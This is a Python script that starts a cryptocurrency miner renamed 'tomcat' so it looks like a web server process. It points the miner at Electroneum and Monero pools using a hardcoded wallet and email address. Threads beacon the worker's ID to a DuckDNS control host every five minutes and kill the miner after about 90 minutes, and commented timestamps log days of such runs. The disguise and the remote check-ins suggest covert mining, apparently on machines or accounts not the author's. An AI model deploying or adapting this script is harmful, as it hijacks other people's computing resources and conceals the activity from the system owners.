import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:44:03.621131
#2018-02-17 17:33:01.287458
#2018-02-17 19:21:06.517472
#2018-02-17 21:13:07.510534
#2018-02-17 22:57:01.247863
#2018-02-18 00:42:01.889618
#2018-02-18 02:32:03.731530
#2018-02-18 04:19:01.687049
#2018-02-18 06:10:06.659444
#2018-02-18 08:01:04.660289
#2018-02-18 09:49:04.858408
#2018-02-18 11:36:03.949902
#2018-02-18 13:21:05.394507
#2018-02-18 15:11:04.121194
#2018-02-18 16:59:05.759303
#2018-02-18 18:47:01.256221
#2018-02-18 20:33:06.364300
#2018-02-18 22:19:01.924840
#2018-02-19 00:08:04.162463
#2018-02-19 01:54:06.938931
#2018-02-19 03:42:06.476630
#2018-02-19 05:27:04.525248
#2018-02-19 07:15:04.251204
#2018-02-19 09:05:01.275133
#2018-02-19 10:53:07.531360
#2018-02-19 12:42:01.640881
#2018-02-19 14:29:04.512101
#2018-02-19 16:17:07.589997
#2018-02-19 18:03:08.312859
#2018-02-19 19:51:05.696242
#2018-02-19 21:40:05.800238
#2018-02-19 23:26:04.585165
#2018-02-20 01:11:06.686893
#2018-02-20 02:59:07.527274
#2018-02-20 04:47:01.954186
#2018-02-20 06:31:02.023843
#2018-02-20 08:16:04.421976
#2018-02-20 10:01:04.007027
#2018-02-20 11:45:11.007137
#2018-02-20 13:34:01.307699
#2018-02-20 15:16:07.707251
#2018-02-20 17:03:02.139837
#2018-02-20 18:50:01.467520
#2018-02-20 20:35:09.993981
#2018-02-20 22:19:02.177213
#2018-02-21 00:00:05.060732
#2018-02-21 01:46:03.987153
#2018-02-21 03:37:04.343832
#2018-02-21 05:25:03.759669
#2018-02-21 07:12:01.346417
#2018-02-21 08:57:05.409476
#2018-02-21 10:44:07.145545
#2018-02-21 12:32:01.697815
#2018-02-21 14:18:07.917526
#2018-02-21 16:06:09.557809
#2018-02-21 17:57:01.514147
#2018-02-21 19:42:10.539906
#2018-02-21 21:29:03.862810
#2018-02-21 23:16:08.145573
#2018-02-22 01:07:05.662116
#2018-02-22 02:54:01.737170
#2018-02-22 04:40:07.390831
#2018-02-22 06:24:04.049684
#2018-02-22 08:10:08.496619
#2018-02-22 09:58:07.460188
#2018-02-22 11:43:07.303137
#2018-02-22 13:30:08.150902
#2018-02-22 15:18:08.700574
#2018-02-22 17:05:02.822994
#2018-02-22 18:52:06.473799
#2018-02-22 20:45:02.135706
#2018-02-22 22:30:08.158512
#2018-02-23 00:15:08.937668
#2018-02-23 02:04:05.961176
#2018-02-23 03:51:02.064472
#2018-02-23 05:43:07.299369
#2018-02-23 07:28:07.380961
#2018-02-23 09:32:01.851187
#2018-02-23 11:37:08.520727
#2018-02-23 13:28:02.072162
#2018-02-23 15:13:05.784945
#2018-02-23 17:01:01.547699
#2018-02-23 18:49:06.405802
#2018-02-23 20:36:03.664309
#2018-02-23 22:22:08.602961
#2018-02-24 00:08:05.725955
#2018-02-24 01:58:06.559874
#2018-02-24 03:51:03.510793
#2018-02-24 05:36:04.941435
#2018-02-24 07:22:01.728946
#2018-02-24 09:12:05.355244
#2018-02-24 11:11:03.700015
#2018-02-24 13:00:07.845607
#2018-02-24 14:47:05.612832
#2018-02-24 16:40:03.950103
#2018-02-24 18:28:07.762139
#2018-02-24 20:15:08.534952
#2018-02-24 22:06:05.166228
#2018-02-25 02:33:07.491947
#2018-02-25 06:14:06.180422
#2018-02-25 11:40:08.166166